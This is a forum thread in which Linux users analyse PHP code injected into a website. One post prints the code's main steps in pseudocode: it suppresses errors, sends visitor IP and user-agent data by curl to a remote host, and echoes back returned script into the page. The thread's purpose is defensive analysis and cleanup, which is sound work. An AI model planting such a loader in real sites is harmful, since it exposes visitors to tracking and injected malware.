Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
It is formatted oddly, Possibly sometype of code injection. What happens when you run the code, it looks like it would cause an error - a little later today im going to give this code a little attention, I have no idea what the preg_match is for.
Analyzing the code that is present here, it does not superficially seem to me that the code is malicious, although it is obviously machine-generated as evidenced by the variable-names ... as well as by the beginning and ending recognition-tags that bracket the code. I also know that curl() is fundamentally a mechanism for initiating a programmatic HTTP "ping" against a remote web site. So maybe this simply some kind of instrumentation code, designed to let someone out there gather usage-statistics ... that "someone" being, say, the legitimate owner of the code/site.
I don't recognize which automated utility might have generated this code-sequence, but I can say pretty certainly that it was generated in such a way, and that it was designed to be removable by the same utility with equal ease. If you know who authored the original page, or can contact them, they can probably tell you right away.
My instincts tell me, however, that this code is probably innocent.
Last edited by sundialsvcs; 02-09-2014 at 02:05 PM.
I disagree, superficial analysis shows that if it is there without the website owner's knowledge, then it is an entirely malicious method of injecting content/code from a remote site into the page.
Here is a summary of what it does in pseudo code but with the actual variable names and paths:
Code:
error_reporting(0) - Disable the page's error reporting to avoid detection
$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'] - Get the user agent string
Test if it is a browser and not a bot, if so...
$wp_srx096146="http://htmlvalue.com/value/?ip=..."
Makes remote request with user IP addr, page referer and user agent, useful for delivering ads,
but also useful for more nefarious purposes such as automated compromise attempts of the user
machine...
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_6146srx = curl_exec ($ch);
Fetches "something" from the remote host htmlvalue.com and assigns it to a new variable $wp_6146srx
if ( substr($wp_6146srx,1,3) === 'scr' ) {
echo $wp_6146srx;
}
Finally, if the expected something was returned as identified by characters 1-3='scr',
echo it into the web page...
Now, note that the final test matches <script>, so undoubtedly it is fetching and injecting javascript into the user's web page. At this point they own the browser view of that page...
They may be injecting ads, or they may be injecting something MUCH worse...
A sure-fire way to see what it is injecting is to put your IP address into the following URL and fetch it with wget. I have not done so as I do not want to launch a bot attack on my own IP!
This part is only reporting part about browsers visited this page,
and looks like simple statistics counter, but:
Looks like you have other parts of code, injecting something in rest of page(s).
Then, this report becomes interesting for attacker about infectected browsers.
1. Restore from good backup.
2. Make most things read only.
3. Close outgoing traffic by FW (if possible).
I'm sorry but Corpus-Khu should never have made that suggestion in the first place. (In a VM maybe, but you simply don't go around asking a victim to run code, especially code you don't understand yourself.)
The focus should have been on examining the extent of the damage, finding out how this could have taken place and then taking the appropriate measures.
Now you posted this on the 9th, meaning almost 2 weeks have passed, so please first tell me you did more for this server than play with Wireshark?
What did you do?
What did you find out?
I found nothing......
Wireshark seems to show that he try to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.
I found nothing......
Wireshark seems to show that he try to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.
But other than finding out how the code got there, and removing it, it really isn't about the server!
The malicious traffic is not between that code and your server, it is between the remote host which the script contacts and the client which loads the script code from your server! So watching your own traffic log will not really show anything!
As Habitual asked, have you removed the code from all the files where you found it?
Looking for your code you won't find much, but search for another wp_ value... Seems quite widespread. Anyway, here is another explanation, in line with what astrogeek wrote, and this points to a possible infection vector, leeched FTP credentials basically. Please check any machine with admin access for viruses and malware, check your server logs for intrusions and check whatever installed in your web stack for no longer maintained plugins or themes and basically any software versions considered stale, vulnerable.
For web 101 class today, I have prepared a simple sequence diagram to illustrate where your server and the malicious script fits into the overall scheme of such... schemes.
Hopefully it will make clear that your server is only a vector for delivering the script, which is itself a vector for delivering additional scripts and potentially gaining access to and control of the client machine, i.e. your site visitors.
The sequence of events is from top to bottom, in the direction of the various arrows.
Note that looking at traffic on your server will see very little, only the delivery of the page code, including the script tag, to your site visitors. Everything else takes place after that point and is between one or more remote sites and the client machine itself - not visible to you!
Important to note is not only that they can and usually do vector to other URLs to load additional malware, but beyond the initial script request they have the IP address of your visitors, and everything that they can connect to it! They can then lanuch exploits directly against the client machine, not only via their browser... this is how botnets are constructed.
The follow on effects are spam email, DDOS attacks, banking and credit card fraud, targeted phishing attacks, extortions, threats, con games, manipulations, viruses, worms, obomacare and just about every other asssorted fraud and crime against otherwise innocent victims - all because they visited your website!
Please confirm that you have removed the code from your servers!
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.